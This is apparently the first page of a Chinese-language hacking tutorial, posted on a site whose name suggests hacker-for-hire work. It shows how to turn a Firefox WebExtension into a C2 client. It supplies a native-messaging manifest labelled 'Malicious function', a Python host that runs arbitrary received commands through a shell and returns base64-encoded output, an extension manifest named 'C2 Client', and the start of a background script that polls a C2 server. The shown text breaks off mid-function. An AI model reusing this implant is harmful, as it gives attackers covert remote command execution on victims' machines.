留意:这项技能仅在Linux进步行了测验，在Mac或许Windows上无法运转。
Firefox Web扩展
火狐的web扩展其实便是插件的新叫法，用JavaScript代码编写，可以与浏览器的API进行交互。所以，根据这一点，我灵光一闪，想到可以写一个web扩展来作为CC客户端。
怎么完成
我细心研读了火狐关于Web扩展的官方文档之后，发现了一个Native Messaging的功用，它们在web扩展和体系程序之间创立了一个通道，假如你想了解更多细节，主张你去阅览官方文档，因为本篇文章不会着重讲这个知识点。
创立一个Native Messaging app
咱们需求两个文件来完成，一个manifest文件和一个应用程序来接纳来自Web扩展的指令，在官方文档上有如下的比如：
· manifest
· application
Manifest文件
这个文件告知火狐有一个新创立的函数可以被答应的web扩展调用，内容如下：
{
  "name": "execution",
  "description": "Malicious function",
  "path": "/home/user/.mozilla/extensions/payload.py",
  "type": "stdio",
  "allowed_extensions": [ "malicious-webextension@github.io" ]
}
可以看到有一个name特点，火狐将会把这个name特点值与一个函数绑定，而且allowed_extensions将只答应咱们的扩展来运用该函数(咱们会在webextension manifest上设置这个值为malicious-webextension@github.io)，特点途径界说了app脚本寄存的方位。
然后仿制该文件到/home/user/.mozilla/native-messaging-hosts/execution.json
App script中。
App脚本
这是一个python脚本，经过STDIN从webextension接纳数据并作为体系指令履行这个值，对呼应进行编码，然后经过STDOUT将它发送到webextension。脚本如下：
#!/usr/bin/env python
 
import sys
import json
import struct
import base64
import subprocess
 
def getMessage():
    rawLength = sys.stdin.buffer.read(4)
    if len(rawLength) == 0:
        sys.exit(0)
    messageLength = struct.unpack('@I', rawLength)[0]
    message = sys.stdin.buffer.read(messageLength).decode('utf-8')
    return json.loads(message)
 
def encodeMessage(messageContent):
    encodedContent = json.dumps(messageContent).encode('utf-8')
    encodedLength = struct.pack('@I', len(encodedContent))
    return {'length': encodedLength, 'content': encodedContent}
 
def sendMessage(encodedMessage):
    sys.stdout.buffer.write(encodedMessage['length'])
    sys.stdout.buffer.write(encodedMessage['content'])
    sys.stdout.buffer.flush()
 
def execcmd(cmd):
    output = subprocess.run(cmd, shell=True, stdout=subprocess.PIPE,universal_newlines=True)
    return base64.b64encode(output.stdout.encode()).decode()
 
while True:
    receivedMessage = getMessage()
sendMessage(encodeMessage(execcmd(receivedMessage)))
现在万事俱备，只欠东风了。webextension可以跟execution这个函数进行交互了。
创立一个webextension
咱们只需求创立两个文件，一个manifest.json文件，包括webextension信息，还有一个background.js文件，包括客户端逻辑。这儿咱们仅仅创立一个简略的比如，当然，咱们可以创立愈加杂乱的客户端。首要咱们来创立manifest文件：
{
  "description": "C2 Client",
  "manifest_version": 2,
  "name": "C2 Client",
  "version": "1.0",
  "applications": {
    "gecko": {
      "id": "malicious-webextension@github.io",
      "strict_min_version": "50.0"
    }
  },
  "background": {
    "scripts": ["background.js"]
  },
  "permissions": ["nativeMessaging",""]
}
我就不对一切参数逐个解说了，这儿最重要的是application里的gecko和id的值。这个值包括了在native messaging app上设置的相同的id，而且在特点permissions中的nativeMessaging值，向Firefox指定了这个webextension可以运用Native Messaging应用程序。
现在咱们来创立一个webextension来与咱们C2服务器交互：
var port;
var timeout = 1000;
var result = "none";
 
var sendMessage = function(){
  server = "http://127.0.0.1:8081/";
  var oReq = new XMLHttpRequest();
  oReq.open('POST',server,true)
  oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded')
 
  oReq.onerror = function (e) {
    setTimeout(sendMessage,timeout); }
 
  oReq.ontimeout = function (e) {
    setTimeout(sendMessage,timeout);
  }
 
  oReq.onload = function(oEvent) {
    if (oReq.status == 200){

[1] [2] [3]  黑客接单网